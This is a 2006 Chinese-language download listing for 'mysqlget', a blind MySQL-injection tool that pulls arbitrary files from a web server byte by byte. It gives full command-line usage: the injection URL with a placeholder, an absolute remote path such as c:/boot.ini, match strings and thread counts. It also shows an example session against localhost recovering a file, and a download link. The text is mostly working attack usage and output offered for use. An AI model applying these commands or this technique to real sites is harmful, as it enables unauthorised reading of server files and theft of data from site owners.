mysqlget.zip提交时间:2006-07-25 更新时间:2006-07-28 提交用户:cooldiyer 工具分类:扫 描 器 运行平台:Windows 工具大小:16155 Bytes 文件MD5 :d6b5be655349e5c2d55d032b4dcc1a7f 工具来源:cooldiyer ROOT:XFOCUS没有经过任何测试和检测,使用后果自负 服务器不支持union查询时的下载工具及源代码,以下为程序说明 mysqlget for mysql injection Version 1.0.0 xdiyer at gmail.com http://xdiyer.uni.cc --------------------------------------------------- Usage: mysqlget <options> <Thread> Options: -t Target injection URL include %s to replace. #注入点URL,"%s"为代码插入处 -f Remote file to load Must be absolute path. #远程文件绝对路径 -s Local file to saved. #保存到本地的路径 -Mr Match code case response right. #正确时匹配的内容 两种情况先一种 -Me Match code case response error. #错误时匹配的内容 Example: mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -Mr test 8 以下是一个实例,下载D:/data.text (内容为“I am cooldiyer \r\n”)到本地E:/data.txt,用5个线程 C:\>mysqlget -t http://localhost/index.php?id=1%s -f d:/data.txt -s E:/data.txt -Mr test 5 --------------------------------------------------- Target > http://localhost/index.php?id=1%s FileLD > d:/data.txt FileSF > E:/data.txt RiCode > test ErCode > Thread > 5 Length > 102400 bytes ARange > 0 - 255 --------------------------------------------------- [+] Waiting for get file length ... [+] File length 17 byte(s) [+] Keep 5 threads get data [Offset 06/17] : 99 [c] [Offset 04/17] : 109 [m] [Offset 01/17] : 73 [I] [Offset 03/17] : 97 [a] [Offset 02/17] : 32 [ ] [Offset 05/17] : 32 [ ] [Offset 07/17] : 111 [o] [Offset 08/17] : 111 [o] [Offset 11/17] : 105 [i] [Offset 10/17] : 100 [d] [Offset 09/17] : 108 [l] [Offset 12/17] : 121 [y] [Offset 13/17] : 101 [e] [Offset 14/17] : 114 [r] [Offset 15/17] : 32 [ ] ]Offset 16/17] : 13 [ [Offset 17/17] : 10 [ ] [+] Threads return using 6s [+] Save file to E:/data.txt ... --------------------------------------------------- #以下是文件内容 I am cooldiyer --------------------------------------------------- 经本机测试256Mem+Win2000下载mysqlget.exe (7680bytes) Use 8 Threads 用时 980 秒。 线程是大不能超过5000,文件大小定义最大为102400bytes,Accii码为1-255,包括汉字,程序用VC++编写,类化了二分查找法,本人能力有限,未知Bug望指正, >> 下载 << |
